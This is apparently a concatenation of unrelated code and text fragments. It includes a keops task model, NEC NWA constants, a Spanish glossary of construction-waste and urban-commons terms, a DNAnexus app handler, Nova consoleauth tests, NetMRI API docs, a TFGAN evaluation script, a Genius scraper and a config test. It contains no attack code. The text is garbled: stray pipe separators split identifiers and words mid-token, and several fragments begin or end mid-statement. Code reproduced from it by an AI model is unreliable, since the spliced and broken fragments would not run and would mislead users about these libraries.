from keops.db import models
STATUS = (
| ('draft', _('Draft')),
('open', _('In Progress')),
('pending', _('Pending')),
('done', _('Done')),
('cancelled', _('Cancelled'))
)
class Category(models.Model):
name = models.CharField(null=False, unique=True)
class TaskType(models | .Model):
name = models.CharField(unique=True, null=False)
description = models.TextField()
status = models.CharField(max_length=16, choices=STATUS)
class Meta:
db_table = 'project_task_type'
class Project(models.Model):
manager = models.ForeignKey('base.User')
class Task(models.Model):
name = models.CharField(max_length=128, db_index=True)
description = models.TextField()
status = models.CharField(max_length=16, choices=STATUS)
|
# Copyright 2 | 015-2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unle | ss required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
NWA_DEVICE_GDV = "GeneralDev"
NWA_DEVICE_TFW = "TenantFW"
NWA_AGENT_TOPIC = 'nwa_agent'
NWA_AGENT_TYPE = 'NEC NWA Agent'
NWA_FIREWALL_PLUGIN = 'NECNWAFWaaS'
# an incremental size if the remaining size is zero.
NWA_GREENPOOL_ADD_SIZE = 32
|
de la lista europea de residuos publicada en el BOE No 43, de 19 de Febrero de 2002 y corregida en el BOE 61, de 12 de marzo del 2002.'),
},
{
'term' : _('Derribo'),
'text' : _('Destrucción deliberada de elementos verticales, muros o edificios.'),
},
{
'term' : _('Desconstrucción'),
'text' : _('Proceso que contiene los siguientes subprocesos: descontaminación, desmontaje, demolición, valorización en la obra, reciclaje de RCD.'),
},
{
'term' : _('Demolición'),
'text' : _('Eliminar de manera controlada una estructura o una parte de esta. Es la combinación de derribo y desmontaje controlado con el fin de eliminar un edificio o parte de este. A diferencia del derribo, la demolición es Segura, Controlada, Selectiva y Precisa.'),
},
{
'term' : _('Descontaminación'),
'text' : _('Eliminación del edificio a demoler la sustancia o sustancias que contaminan o pueden contaminar el medio.'),
},
{
'term' : _('Desmontaje'),
'text' : _('Operación de separar las partes o las piezas, que forman un todo.'),
},
{
'term' : _('Entidades locales'),
'text' : _('Son Entidades Locales o Administraciones públicas de carácter territorial local: El Municipio, la Provincia y la Isla (en los archipiélagos balear y canario), (art. 1.2 LBRL).'),
},
{
'term' : _('Entidad privada sin ánimo de lucro'),
'text' : _('Entidad cuyo fin no es la consecución de un beneficio económico. Suelen tener la figura jurídica de asociación, fundación, mutualidad o cooperativa (las cooperativas pueden tener o carecer de ánimo de lucro), y donde el eventual excedente de su actividad se reinvierte en los fines que tiene por objeto en sus estatutos.'),
},
{
'term' : _('Municipio'),
'text' : _('Entidad local básica de la organización territorial del estado y cauce inmediato de participación ciudadana en los asuntos públicos, que institucionaliza y gestiona con autonomía los intereses propios de las correspondientes colectividades (art. 1.1 LBRL).'),
},
{
'term' : _('Oneroso'),
'text' : _('No gratuito, que exige alguna contraprestación.'),
},
{
'term' : _('Valorización'),
'text' : _('Proceso para volver a hacer útil un residuo o un componente de un residuo.'),
},
{
'term' : _('RCD'),
'text' : _('Residuo producto de una construcción o demolición.'),
},
{
'term' : _('Reutilizar'),
'text' : _('Emplear de manera útil un material simple o compuesto, utilizado anteriormente, con posibilidades de cambiar su uso, sus características o su ubicación.'),
},
{
'term' : _('Reciclar'),
'text' : _('Procesar un material para ser reutilizado, no necesariamente en su forma original.'),
},
{
'term' : _('Recurso'),
'text' : _('Conjunto de elementos disponibles para resolver una necesidad.'),
},
{
'term' : _('Residuo'),
'text' : _('Aquéllo que resta de un todo después de sustraer una o más partes. Aquello que resulta de la descomposición o destrucción de algo.'),
},
{
'term' : _('Residuo primario'),
'text' : _('Residuo antes de estudiar las posibilidades que ofrece de tratamiento para dejar de ser un residuo.'),
},
{
'term' : _('Subproducto'),
'text' : _('Residuos que se pueden utilizar directamente como primeras materias otras producciones o como sustituto de productos comerciales y que son recuperables sin necesidad de someterlos a operaciones de tratamiento.'),
},
],
'commons' : [
{
'term' : _('Bienes comunes urbanos'),
'text' : _('aquellos bienes materiales, inmateriales y/o digitales, que los Ciudadanos y la Administración, incluidos aquellos realizados a través de procedimientos participativos y deliberativos, reconocen como funcionales para el bienestar individual y colectivo.'),
},
{
'term' : _('Ciudadanos activos'),
'text' : _('Todos los sujetos, individuos, asociaciones o cualquier otro colectivo, también en forma de negocio u organización social, que actúen en favor del cuidado y regeneración de los bienes comunes urbanos.'),
},
{
'term' : _('Propuesta de colaboración'),
'text' : _('La manifestación de interés, formulada por los ciudadanos activos, cuya finalidad es la intervención de cuidado y regeneración de los bienes comunes urbanos. La propuesta puede ser espontánea o en respuesta a una solicitud formulada por el Ayuntamiento.'),
},
{
'term' : _('Acuerdo de colaboración'),
'text' : _('El pacto a través del cual el Ayuntamiento o la entidad privada y los ciudadanos activos definen el alcance de las intervenciones de cuidado y regeneración de los bienes comunes urbanos.'),
},
{
'term' : _('Intervenciones de cuidado'),
'text' : _('Intervenciones orientadas a la protección, conservación y mantenimiento de los bienes comunes urbanos para garantizar y mejorar su facilidad de uso y calidad.os, reconocen como funcionales para el bienestar individual y colectivo.'),
},
{
'term' : _('Gestión compartida'),
'text' : _('Aquellas intervenciones de cuidado de bienes comunes urbanos realizadas conjuntamente por los Ciudadanos y la Administración con carácter de continuidad e inclusión.'),
},
{
'term' : _('Intervenciones de regeneración'),
'text' : _('Trabajos de restauración, transformación e innovaci | ón de los bienes comunes, realizados a través de métodos de co-diseño e integrados con procesos sociales, económicos, tecnológicos y ambientales, que en su conjunto tienen un impacto en la me | jora de la calidad de vida del ciudadano.'),
},
{
'term' : _('Espacios públicos'),
'text' : _('Zonas verdes, plazas, calles, aceras y otros espacios públicos o abiertos al público, de propiedad o de uso público.'),
},
{
'term' : _('Confianza mutua'),
'text' : _('Sin perjuicio de las prerrogativas de supervisión pública, planificación y verificación, la Administración y los ciudadanos activos abordarán su relación desde la confianza mutua y asumiendo que la respectiva cooperación voluntaria se orienta a la consecución de fines de interés general.'),
},
{
'term' : _('Publicidad y transparencia'),
'text' : _('La administración garantizará la máxima difusión de oportunidades de colaboración, propuestas recibidas, ayudas concedidas, decisiones tomadas y resultados de las evaluaciones realizadas. Se reconocerá la transparencia como el principal instrumento para garantizar la igualdad en las relaciones con los ciudadanos activos.'),
},
{
'term' : _('Responsabilidades'),
'text' : _('La administración valorará la responsabilidad propia y de los ciudadanos como un elemento central en la relación con los ciudadanos, así como una condición indispensable para que la colaboración resulte efectivamente enfocada a la producción de resultados útiles y mensurables.'),
},
{
'term' : _('Inclusión'),
'text' : _('Las intervenciones |
ias* has default value "default".
'''
self._dxid = None
self._name = None
self._alias = None
if dxid is not None:
if name is not None or alias is not None:
raise DXError("Did not expect name or alias to be given if dxid is given")
verify_string_dxid(dxid, self._class)
self._dxid = dxid
elif name is not None:
self._name = name
if not isinstance(name, basestring):
raise DXError("App name needs to be a string: %r" % (name,))
if alias is not None:
if not isinstance(alias, basestring):
raise DXError("App alias needs to be a string: %r" % (alias,))
self._alias = alias
else:
self._alias = 'default'
def get_id(self):
'''
:returns: Object ID of associated app
:rtype: string
Returns the object ID of the app that the handler is currently
associated with.
'''
if self._dxid is not None:
return self._dxid
else:
return 'app-' + self._name + '/' + self._alias
def new(self, **kwargs):
'''
:param initializeFrom: ID of an existing app object from which to initialize the app
:type initializeFrom: string
:param applet: ID of the applet that the app will be created from
:type applet: string
:param name: Name of the app (inherits from *initializeFrom* if possible)
:type name: string
:param title: Title or brand name of the app (optional)
:type title: string
:param summary: A short description of the app (optional)
:type summary: string
:param description: An extended description of the app (optional)
:type description: string
:param details: Arbitrary JSON to be associated with the app (optional)
:type details: dict or list
:param version: Version number
:type version: string
:param bill_to: ID of the user or organization who will own the app and be billed for its space usage ( | optional if an app with this name already exists)
:type bill_to: string
:param access: Access specification (optional)
:type access: dict
:param resources: Specifies what is to be put into the app's resources | container. Must be a string containing a project ID, or a list containing object IDs. (optional)
:type resources: string or list
.. note:: It is highly recommended that the higher-level module
:mod:`dxpy.app_builder` or (preferably) its frontend `dx build --create-app
<https://wiki.dnanexus.com/Command-Line-Client/Index-of-dx-Commands#build>`_
be used instead for app creation.
Creates an app with the given parameters by using the specified
applet or app as a base and overriding its attributes. See the
API documentation for the `/app/new
<https://wiki.dnanexus.com/API-Specification-v1.0.0/Apps#API-method%3A-%2Fapp%2Fnew>`_
method for more info.
Exactly one of *initializeFrom* and *applet* must be provided.
The app is only available to its developers until
:meth:`publish()` is called, and is not run until :meth:`run()`
is called.
'''
dx_hash = {}
if 'applet' not in kwargs and 'initializeFrom' not in kwargs:
raise DXError("%s: One of the keyword arguments %s and %s is required" % (self.__class__.__name__, 'applet', 'initializeFrom'))
for field in ['version']:
if field not in kwargs:
raise DXError("%s: Keyword argument %s is required" % (self.__class__.__name__, field))
dx_hash[field] = kwargs[field]
del kwargs[field]
for field in 'initializeFrom', 'applet', 'name', 'title', 'summary', 'description', 'billing', 'access', 'resources':
if field in kwargs:
dx_hash[field] = kwargs[field]
del kwargs[field]
if "bill_to" in kwargs:
dx_hash['billTo'] = kwargs['bill_to']
del kwargs["bill_to"]
resp = dxpy.api.app_new(dx_hash, **kwargs)
self.set_id(dxid=resp["id"])
def describe(self, fields=None, **kwargs):
'''
:param fields: Hash where the keys are field names that should be returned, and values should be set to True (default is that all fields are returned)
:type fields: dict
:returns: Description of the remote app object
:rtype: dict
Returns a dict with a description of the app. The result
includes the key-value pairs as specified in the API
documentation for the `/app-xxxx/describe
<https://wiki.dnanexus.com/API-Specification-v1.0.0/Apps#API-method%253A-%252Fapp-xxxx%255B%252Fyyyy%255D%252Fdescribe>`_
method.
'''
describe_input = {}
if fields:
describe_input['fields'] = fields
if self._dxid is not None:
self._desc = dxpy.api.app_describe(self._dxid, input_params=describe_input, **kwargs)
else:
self._desc = dxpy.api.app_describe('app-' + self._name, alias=self._alias,
input_params=describe_input, **kwargs)
return self._desc
def update(self, **kwargs):
'''
:param applet: ID of the applet to replace the app's contents with
:type applet: string
:param details: Metadata to store with the app (optional)
:type details: dict or list
:param access: Access specification (optional)
:type access: dict
:param resources: Specifies what is to be put into the app's resources container. Must be a string containing a project ID, or a list containing object IDs. (optional)
:type resources: string or list
Updates the parameters of an existing app. See the API
documentation for the `/app/update
<https://wiki.dnanexus.com/API-Specification-v1.0.0/Apps#API-method%253A-%252Fapp-xxxx%255B%252Fyyyy%255D%252Fupdate>`_
method for more info.
The current user must be a developer of the app.
'''
updates = {}
for field in 'applet', 'billing', 'access', 'resources', 'details':
if field in kwargs:
updates[field] = kwargs[field]
del kwargs[field]
if self._dxid is not None:
resp = dxpy.api.app_update(self._dxid, input_params=updates, **kwargs)
else:
resp = dxpy.api.app_update('app-' + self._name, alias=self._alias,
input_params=updates, **kwargs)
def add_tags(self, tags, **kwargs):
"""
:param tags: Tags to add to the app
:type tags: array
Adds the specified application name tags (aliases) to this app.
The current user must be a developer of the app.
"""
if self._dxid is not None:
return dxpy.api.app_add_tags(self._dxid, input_params={"tags": tags}, **kwargs)
else:
return dxpy.api.app_add_tags('app-' + self._name, alias=self._alias,
input_params={"tags": tags}, **kwargs)
def addTags(self, tags, **kwargs):
"""
.. deprecated:: 0.72.0
Use :meth:`add_tags()` instead.
"""
return self.add_tags(tags, **kwargs)
def remove_tags(self, tags, **kwargs):
"""
:param tags: Tags to remove from the app
:type tags: array
Removes the specified application name tags (aliases) from this
app, so that it is no longer addressable by those aliases.
The current user must be a developer of the app.
"""
if self._dxid is not None:
return dxpy.api.app_remove_tags(self._dxid, input_params={"tags": tags}, **kwargs)
else:
return dxpy.api.app_remove_tags('app-' + self._name, alias=self._alias,
input_params={"tags": tags}, **kwar |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file | except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache. | org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for Consoleauth Code.
"""
import mox
from nova.consoleauth import manager
from nova import context
from nova import db
from nova.openstack.common import timeutils
from nova import test
class ConsoleauthTestCase(test.TestCase):
"""Test Case for consoleauth."""
def setUp(self):
super(ConsoleauthTestCase, self).setUp()
self.manager = manager.ConsoleAuthManager()
self.context = context.get_admin_context()
self.instance = db.instance_create(self.context, {})
def test_tokens_expire(self):
# Test that tokens expire correctly.
self.useFixture(test.TimeOverride())
token = u'mytok'
self.flags(console_token_ttl=1)
self._stub_validate_console_port(True)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
self.assertTrue(self.manager.check_token(self.context, token))
timeutils.advance_time_seconds(1)
self.assertFalse(self.manager.check_token(self.context, token))
def _stub_validate_console_port(self, result):
def fake_validate_console_port(ctxt, instance, port, console_type):
return result
self.stubs.Set(self.manager.compute_rpcapi,
'validate_console_port',
fake_validate_console_port)
def test_multiple_tokens_for_instance(self):
tokens = [u"token" + str(i) for i in xrange(10)]
self._stub_validate_console_port(True)
for token in tokens:
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
for token in tokens:
self.assertTrue(self.manager.check_token(self.context, token))
def test_delete_tokens_for_instance(self):
tokens = [u"token" + str(i) for i in xrange(10)]
for token in tokens:
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
self.manager.delete_tokens_for_instance(self.context,
self.instance['uuid'])
stored_tokens = self.manager._get_tokens_for_instance(
self.instance['uuid'])
self.assertEqual(len(stored_tokens), 0)
for token in tokens:
self.assertFalse(self.manager.check_token(self.context, token))
def test_wrong_token_has_port(self):
token = u'mytok'
self._stub_validate_console_port(False)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
instance_uuid=self.instance['uuid'])
self.assertFalse(self.manager.check_token(self.context, token))
def test_console_no_instance_uuid(self):
self.manager.authorize_console(self.context, u"token", 'novnc',
'127.0.0.1', '8080', 'host',
instance_uuid=None)
self.assertFalse(self.manager.check_token(self.context, u"token"))
def test_delete_expired_tokens(self):
self.useFixture(test.TimeOverride())
token = u'mytok'
self.flags(console_token_ttl=1)
self._stub_validate_console_port(True)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
timeutils.advance_time_seconds(1)
self.assertFalse(self.manager.check_token(self.context, token))
token1 = u'mytok2'
self.manager.authorize_console(self.context, token1, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
stored_tokens = self.manager._get_tokens_for_instance(
self.instance['uuid'])
# when trying to store token1, expired token is removed fist.
self.assertEqual(len(stored_tokens), 1)
self.assertEqual(stored_tokens[0], token1)
class ControlauthMemcacheEncodingTestCase(test.TestCase):
def setUp(self):
super(ControlauthMemcacheEncodingTestCase, self).setUp()
self.manager = manager.ConsoleAuthManager()
self.context = context.get_admin_context()
self.u_token = u"token"
self.u_instance = u"instance"
def test_authorize_console_encoding(self):
self.mox.StubOutWithMock(self.manager.mc, "set")
self.mox.StubOutWithMock(self.manager.mc, "get")
self.manager.mc.set(mox.IsA(str), mox.IgnoreArg(), mox.IgnoreArg()
).AndReturn(True)
self.manager.mc.get(mox.IsA(str)).AndReturn(None)
self.manager.mc.set(mox.IsA(str), mox.IgnoreArg()).AndReturn(True)
self.mox.ReplayAll()
self.manager.authorize_console(self.context, self.u_token, 'novnc',
'127.0.0.1', '8080', 'host',
self.u_instance)
def test_check_token_encoding(self):
self.mox.StubOutWithMock(self.manager.mc, "get")
self.manager.mc.get(mox.IsA(str)).AndReturn(None)
self.mox.ReplayAll()
self.manager.check_token(self.context, self.u_token)
def test_delete_tokens_for_instance_encoding(self):
self.mox.StubOutWithMock(self.manager.mc, "delete")
self.mox.StubOutWithMock(self.manager.mc, "get")
self.manager.mc.get(mox.IsA(str)).AndReturn('["token"]')
self.manager.mc.delete(mox.IsA(str)).AndReturn(True)
self.manager.mc.delete(mox.IsA(str)).AndReturn(True)
self.mox.ReplayAll()
self.manager.delete_tokens_for_instance(self.context, self.u_instance)
class CellsConsoleauthTestCase(ConsoleauthTestCase):
"""Test Case for consoleauth w/ cells enabled."""
def setUp(self):
super(CellsConsoleauthTestCase, self).setUp()
self.flags(enable=True, group='cells')
def _stub_validate_console_port(self, result):
def fake_validate_console_port(ctxt, instance_uuid, console_port,
console_type):
return result
self.stubs.Set(self.manager.cells_rpcapi,
'validate_console_port',
fake_validate_console_port)
|
if comma delimited string is passed, and it must contain an even number of values.
:type op_Timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_Timestamp: If op_Timestamp is specified, the field named in this input will be compared to the value in Timestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_Timestamp must be specified if op_Timestamp is specified.
:type val_f_Timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_Timestamp: If op_Timestamp is specified, this value will be compared to the value in Timestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_Timestamp must be specified if op_Timestamp is specified.
:type val_c_Timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanID: The operator to apply to the field VlanID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanID: The internal NetMRI identifier of the VLAN to which this issue applies, if relevant. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanID: If op_VlanID is specified, the field named in this input will be compared to the value in VlanID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanID must be specified if op_VlanID is specified.
:type val_f_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanID: If op_VlanID is specified, this value will be compared to the value in VlanID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanID must be specified if op_VlanID is specified.
:type val_c_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the issue details as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of issue detail methods. The listed methods will be called on each issue detail returned and included in the output. Available methods are: data_source, device, interface, iprg, vlan, subnet, alternate_device, issue_desc, title, severity, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, iprg, vlan, subnet, alternate_device, issue_desc.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` IssueID
:param sort: The data field(s) to use for sorting the output. Default is IssueID. Valid values are DataSourceID, IssueID, StartTime, EndTime, ChangedCols, Timestamp, IssueTypeID, DetailID, DeviceID, InterfaceID, VlanID, SubnetID, IprgID, BatchID, AltDeviceID, Criteria, IssueValue, Component, SeverityID, Correctness, Stability, SuppressedInd.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each IssueDetail. Valid values are DataSourceID, IssueID, StartTime, EndTime, ChangedCols, Timestamp, IssueTypeID, DetailID, DeviceID, InterfaceID, VlanID, SubnetID, | IprgID, BatchID, AltDeviceID, Criteria, IssueValue, Component, SeverityID, Correctness, Stability, SuppressedInd. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| | ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
|
# coding=utf-8
# Copyright 2022 The TensorFlow GAN Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless | required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluates an InfoGAN TFGAN trained MNI | ST model.
The image visualizations, as in https://arxiv.org/abs/1606.03657, show the
effect of varying a specific latent variable on the image. Each visualization
focuses on one of the three structured variables. Columns have two of the three
variables fixed, while the third one is varied. Different rows have different
random samples from the remaining latents.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import tensorflow.compat.v1 as tf
from tensorflow_gan.examples.mnist import infogan_eval_lib
flags.DEFINE_string('checkpoint_dir', '/tmp/mnist/',
'Directory where the model was written to.')
flags.DEFINE_string('eval_dir', '/tmp/mnist/',
'Directory where the results are saved to.')
flags.DEFINE_integer(
'noise_samples', 6,
'Number of samples to draw from the continuous structured '
'noise.')
flags.DEFINE_integer('unstructured_noise_dims', 62,
'The number of dimensions of the unstructured noise.')
flags.DEFINE_integer('continuous_noise_dims', 2,
'The number of dimensions of the continuous noise.')
flags.DEFINE_integer(
'max_number_of_evaluations', None,
'Number of times to run evaluation. If `None`, run '
'forever.')
flags.DEFINE_boolean('write_to_disk', True, 'If `True`, run images to disk.')
FLAGS = flags.FLAGS
def main(_):
hparams = infogan_eval_lib.HParams(
FLAGS.checkpoint_dir, FLAGS.eval_dir, FLAGS.noise_samples,
FLAGS.unstructured_noise_dims, FLAGS.continuous_noise_dims,
FLAGS.max_number_of_evaluations,
FLAGS.write_to_disk)
infogan_eval_lib.evaluate(hparams, run_eval_loop=True)
if __name__ == '__main__':
tf.disable_v2_behavior()
app.run(main)
|
import re
from bs4 import BeautifulSoup
from ..const import constant
from ..bsopener import BSOpener
class RGArtist(object):
"""RapGeniusArtist"""
class _Const(object):
""" Contains constants used in outter class """
@constant
def RG_ARTIST_BASE_URL():
return "http://genius.com/artists/"
@constant
def RG_ARTIST_SONGS_BASE_URL():
return "http://genius.com/artists/songs?for_artist_page="
@constant
def RG_ARTIST_PAGENUM_PREF():
""" Prefix for page number """
return "&page="
def __init__(self, artist_url):
self.CONST = self._Const()
self.urlopener = BSOpener()
self.artist_url = artist_url
self.artist_id = self._get_artist_id(self.artist_url) # numerical artist id
self.artist_songs = self.CONST.RG_ARTIST_SONGS_BASE_URL + self.artist_id
@classmethod
def from_artist_name(cls, artist_name):
""" Returns a new instance of RGArtist from artist name
Assumes that the artist url is in the form
http://genius.com/artists/<artist_name>, where
<artist_name> is the artist_name provided as an
argument with spaces replaced by "-" and "." removed. This method might return
a bogus url, since RapGenius doesn't seem to be following any convention for
the names (for example, sometimes "." in names simply get removed, while in
other instances they get replaced by "-").
"""
return RGArtist(cls._Const().RG_ARTIST_BASE_URL + artist_name.replace(" ", "-").replace(".", ""))
def _get_artist_id(self, artist_url):
""" Returns the numeric id of the artist """
bsObj = self.urlopener.bsopen(artist_url)
content_val = bsObj.find("meta", {"property":"twitter:app:url:iphone"}).attrs["content"]
return re.findall("[0-9]+$", content_val)[0]
def _get_songs_BSObj(self, page_num=1):
""" Returns a list of song BeautifulSoup objects
The returned list contains the <li>'s of each song, the song url and other info,
such as the song title, can be extracted from it.
Returns:
list: list of song BeautifulSoup ob | jects if there is at least one song on the page
None: if there are no songs on the page
"""
page_url = self.artist_songs + self.CONST.RG_ARTIST_PAGENUM_PREF + str(page_num)
print("Page url = " + page_url)
bsObj = self.urlopener.bsopen(page_url)
song_container = bsObj. | find("ul", {"class":["song_list", "primary_list"]})
if song_container is None:
return None # no songs found on the page
return song_container.findAll("li")
def _get_song_text_BSObj(self, song_url):
""" Returns BeautifulSoup object with the lyrics content """
bsObj = self.urlopener.bsopen(song_url)
return bsObj.find("lyrics", {"class":"lyrics"}).find("p") if bsObj is not None else None
def get_song_urls(self, page_num=1):
""" Return a list of song urls from page page_num.
Returns:
list: list of song urls (as strings) if there is at least one song on the page
None: if there are no songs on the page
"""
bsObj_list = self._get_songs_BSObj(page_num)
if bsObj_list is None:
return None # no songs found on the page
song_urls = [] # contains the list of song urls found on the page
# not using list comprehension because we want to filter out None's
for bsObj in bsObj_list:
anchor = bsObj.find("a", {"class":"song_link"})
# make sure that we don't include any None's in our urls list
if anchor is not None:
url = anchor.attrs["href"]
if url is not None:
song_urls += [url]
# we don't want to return empty lists
return song_urls if len(song_urls) > 0 else None
def get_songs_title(self, page_num=1):
""" Return a list of song titles from page page_num.
Returns:
list: list of song titles (as strings) if there is at least one song on the page
None: if there are no songs on the page
"""
bsObj_list = self._get_songs_BSObj(page_num)
if bsObj_list is None:
return None # no songs found on the page
song_titles = [] # contains the list of song titles found on the page
# not using list comprehension because we want to filter out None's
for bsObj in bsObj_list:
span = bsObj.find("span", {"class":"song_title"})
# make sure that we don't include any None's or empty strings in our titles list
if span not in [None, ""]:
title = span.get_text()
if title is not None:
song_titles += [title]
# we don't want to return empty lists
return song_titles if len(song_titles) > 0 else None
def get_song_text(self, url):
""" Returns song text as a string """
result = ""
bsObj = self._get_song_text_BSObj(url)
return "".join(bsObj.find_all(text=True)) if bsObj is not None else ""
def get_song_title(self, url):
""" Returns song title as a string """
pass
|
__all__ = ["test_avl", "test_binary", "test | _bloom", "test_fortune", "test_hashtable",
"test_kd", "test_kd_factory", "test_knapsack", "test_mergesort", "test_qua | d",
"test_R"] |
import os
import sys
sys.path.insert(0,os.path.abspath(__file__+"/../.."))
import unittest
import json
from transgression import config
class ConfigTest(unittest.TestCase):
def setUp(self):
self.mJsonString = open(os.path.abspath(os.path.dirname(os.path.realpath(__file__))+"/data/testConfig.json"), 'r').read()
def test_configuration_construction(self):
configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
self.assertTrue(configObj.hasApplication('Jingit'))
self.assertEquals('Jingit', configObj.getApplication('Jingit').getAppName())
self.assertEquals('air.com.jingit.mobile', configObj.getApplication('Jingit').getPlatformConfiguration('android').getProcessName())
self.assertEquals(2009, configObj.getApplication('Jingit').getPlatformConfiguration('android').getFirstBinaryDate().year)
self.assertEquals('sftp', configObj.getApplication('Jingit').getPlatformConfiguration('android').getBinaryRepository().getProtocol())
self.assertEquals('jenkinsmonkey.local/APKS/%year%-%month%-%day%/%time%/%commitid%/%appname%-debug-%buildnumber%.apk', configObj.getApplication('Jingit').getPlatformConfiguration('android').getBinaryRepository().getLocationFormatString())
def test_configuration_add_application(self):
configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
platformConfigDict = { 'windows' : { 'firstBinaryDate' : '2010-01-01', 'processName' : 'Jingit-bin', 'binaryRepository' : { 'protocol' : 'sftp', 'location': 'www.google.com'}}}
configObj.addApplication('testApp', platformConfigDict)
self.assertTrue(configObj.hasApplication('testApp'))
self.assertEquals('testApp', configObj.getApplication('testApp').getAppName())
self.assertEquals('Jingit-bin', configObj.getApplication('testApp').getPlatformConfiguration('windows').getProcessName())
self.assertEquals(2010, configObj.getApplication('testApp').getPlatformConfiguration('windows').getFirstBinaryDate().year)
self.assertEquals('sftp', configObj.getApplication('testApp').getPlatformConfiguration('windows').getBinaryRepository().getProtocol())
self.assertEquals('www.google.com', configObj.getApplication('testApp').getPlatformConfiguration('windows').getBinaryRepository().getLocationFormatString())
# def test_add_application(self):
# configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
# platformConfigDict = { 'windows' : { 'firstBinaryDate' : '2010-01-01', 'processName' : 'Jingit-bin', 'binaryRepository' : { 'protocol' : 'sftp', 'location': 'www.google.com'}}}
# configObj.addApplication('WokkaWokka', platformConfigDict)
def test_json_encoding(self):
configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
app = configObj.getApplication('Jingit')
platConfig = app.getPlatformConfiguration('android')
